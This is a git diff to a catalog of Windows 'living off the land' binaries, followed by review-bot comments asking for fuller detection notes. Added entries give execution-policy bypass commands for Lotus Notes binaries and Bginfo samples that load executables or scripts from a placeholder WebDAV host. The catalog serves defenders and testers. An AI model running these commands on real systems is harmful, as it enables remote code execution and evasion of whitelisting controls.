diff --git a/LOLBins.md b/LOLBins.md index 8d5b4dd..a846291 100644 --- a/LOLBins.md +++ b/LOLBins.md @@ -92,6 +92,8 @@ If you are missing from the acknowledgement, please let me know (I did not forge # OTHER NON MICROSOFT BINARIES [Gpup.exe](OtherBinaries/Gpup.md) +[Nlnotes.exe](OtherBinaries/Nlnotes.md) +[Notes.exe](OtherBinaries/Notes.md) [Nvuhda6.exe](OtherBinaries/Nvuhda6.md) [Nvudisp.exe](OtherBinaries/Nvudisp.md) [VBoxDrvInst.exe](OtherBinaries/VBoxDrvInst.md) diff --git a/OSLibraries/Syssetup.md b/OSLibraries/Syssetup.md index 8fa59dc..e030e5e 100644 --- a/OSLibraries/Syssetup.md +++ b/OSLibraries/Syssetup.md @@ -8,12 +8,14 @@ rundll32 syssetup,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\calc.IN Acknowledgements: * Pierre-Alexandre Braeken - @pabraeken +* Matt harr0ey - @harr0ey Code sample: * Resources: * https://twitter.com/pabraeken/status/994392481927258113 +* https://twitter.com/harr0ey/status/975350238184697857 Full path: ``` diff --git a/OtherBinaries/Nlnotes.md b/OtherBinaries/Nlnotes.md new file mode 100644 index 0000000..dcd76fd --- /dev/null +++ b/OtherBinaries/Nlnotes.md @@ -0,0 +1,31 @@ +## Nlnotes.exe + +* Functions: Execute + +``` +NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass } +``` + +Acknowledgements: +* Daniel Bohannon - @danielhbohannon + +Code sample: +* + +Resources: +* https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f +* https://twitter.com/HanseSecure/status/995578436059127808 + + +Full path: +``` +? +``` + +Notes: +Used by Lotus Notes + + +Detection: + + diff --git a/OtherBinaries/Notes.md b/OtherBinaries/Notes.md new file mode 100644 index 0000000..c95a81f --- /dev/null +++ b/OtherBinaries/Notes.md 
@@ -0,0 +1,31 @@ +## Notes.exe + +* Functions: Execute + +``` +Notes.exe" "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass } +``` + +Acknowledgements: +* Daniel Bohannon - @danielhbohannon + +Code sample: +* + +Resources: +* https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f +* https://twitter.com/HanseSecure/status/995578436059127808 + + +Full path: +``` +C:\Program Files (x86)\IBM\Lotus\Notes\notes.exe +``` + +Notes: +Used by Lotus Notes + + +Detection: + + diff --git a/OtherMSBinaries/Bginfo.md b/OtherMSBinaries/Bginfo.md index ae9210d..a4399f3 100644 --- a/OtherMSBinaries/Bginfo.md +++ b/OtherMSBinaries/Bginfo.md @@ -3,11 +3,35 @@ * Functions: Execute ``` -bginfo.exe bginfo.bgi /popup /nolicprompt -(Add vbs code inside .bgi file) +bginfo.exe bginfo.bgi /popup /nolicprompt + +"\\10.10.10.10\webdav\bginfo.exe" bginfo.bgi /popup /nolicprompt + +"\\live.sysinternals.com\Tools\bginfo.exe" \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt ``` Acknowledgements: * Oddvar Moe - @oddvarmoe - - \ No newline at end of file + +Code sample: +* https://github.com/api0cradle/BGInfo/blob/master/BGITool_1.0.ps1 + +Resources: +* https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/ +* https://oddvar.moe/2017/05/22/clarification-bginfo-4-22-applocker-still-vulnerable/ +* https://twitter.com/Oddvarmoe/status/865330067630694400 +* https://twitter.com/ItsReallyNick/status/996133093613424641 +* https://github.com/3gstudent/bgi-creater +* https://pentestlab.blog/2017/06/05/applocker-bypass-bginfo/ + +Full path: +``` +No fixed path +``` + +Notes: +Used to set background image in Windows with details about the environment + + +Detection: +Bginfo.exe requesting files externally or running VBS scripts. diff --git a/README.md b/README.md index a45c23b..3d0a136 100644 --- a/README.md +++ b/README.md 
@@ -34,7 +34,7 @@ Also, please be patient if it takes some time for your contribution to be added Every binary, script and library has it's own .md file in the subfolders. That way I should be easier to maintain and reuse. I have borrowed examples from the community (And a lot from Red Canary - Atomic Red Team - Thanks @subtee) Would really love if the community could contribute as much as possible. That would make it better for everyone. -If you think it is hard to make a pull request using github, don't hasitate to send me a tweet and I will add the contribution for you. +If you think it is hard to make a pull request using github, don't hesitate to send me a tweet and I will add the contribution for you. ## STORY @@ -78,4 +78,4 @@ Love this logo: - [ ] Map it to the Mitre Att&ck <3 - [ ] LOLGuiBins - [ ] More list based on classifications -- [ ] LOLBAS lists for Linux? OSX? \ No newline at end of file +- [ ] LOLBAS lists for Linux? OSX?
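Review bot: in the OSLibraries/Syssetup.md hunk, the `Code sample:` bullet that sits between the new acknowledgement (`* Matt harr0ey - @harr0ey`) and the new resource link stays an empty `*`; if the linked tweet carries a usable sample, reference it under Code sample too, otherwise drop the empty bullet so the section does not read as half-filled. The new acknowledgement also breaks the file's existing convention of full name before handle (`* Pierre-Alexandre Braeken - @pabraeken`); keep one form across the file.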
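Review bot: the new OtherBinaries/Nlnotes.md ships with `Full path:` set to `?` and an empty `Detection:` section, so the entry gives defenders nothing to look for even though its own sample line supplies the indicator: `NLNOTES.EXE` started with a `-Command` argument and an `"=N:\...\notes.ini"` argument pointing outside the expected data directory. Record at least that command-line pattern under Detection, and either fill in the install path (if the binary sits in the same Lotus Notes program directory as notes.exe, say so) or state explicitly that it is unknown. `Notes: Used by Lotus Notes` reads as a placeholder; one sentence on what the binary does for the product would bring the entry up to the level of Bginfo.md in this same patch, which describes the tool's purpose.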
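Review bot: in the new OtherBinaries/Notes.md the sample line `Notes.exe" "=N:\Lotus\Notes\Data\notes.ini" -Command ...` has an unbalanced quote (a closing `"` after `Notes.exe` with no opening one), so the quoting should be made consistent with the Nlnotes.md sample before merging. Apart from the executable name, the file duplicates Nlnotes.md line for line (same acknowledgement, same gist and tweet, same `?`-style gaps and empty `Detection:`); a one-line cross-reference between the two entries, plus a Detection note that `notes.exe` invoked with a `-Command` argument is the thing to alert on, would make both files useful to someone searching the list.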
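Review bot: the OtherMSBinaries/Bginfo.md hunk deletes `(Add vbs code inside .bgi file)`, which was the only statement of where the script payload lives, and the new `Notes:` text (`Used to set background image in Windows with details about the environment`) does not restore it, so a reader of the three sample lines cannot tell why a `.bgi` file matters; keep that hint, for instance under Notes. The first `-`/`+` pair (`bginfo.exe bginfo.bgi /popup /nolicprompt`) is byte-identical as rendered, so it is presumably a line-ending or trailing-whitespace change; check the file is not left mixing CRLF and LF. The two added samples load `bginfo.exe` or `bginfo.bgi` from UNC paths (`\\10.10.10.10\webdav\...`, `\\live.sysinternals.com\Tools\...`), which is what the Detection line `requesting files externally` refers to; naming that explicitly (bginfo.exe executed from, or reading its .bgi from, a UNC or WebDAV path) ties Detection to the samples.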
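Review bot: the README.md hunk at `@@ -34,7 +34,7 @@` fixes `hasitate` to `hesitate`, but the unchanged context two lines above carries two more slips worth fixing in the same pass: `has it's own .md file` should be `has its own .md file`, and `That way I should be easier to maintain` should be `That way it should be easier to maintain`.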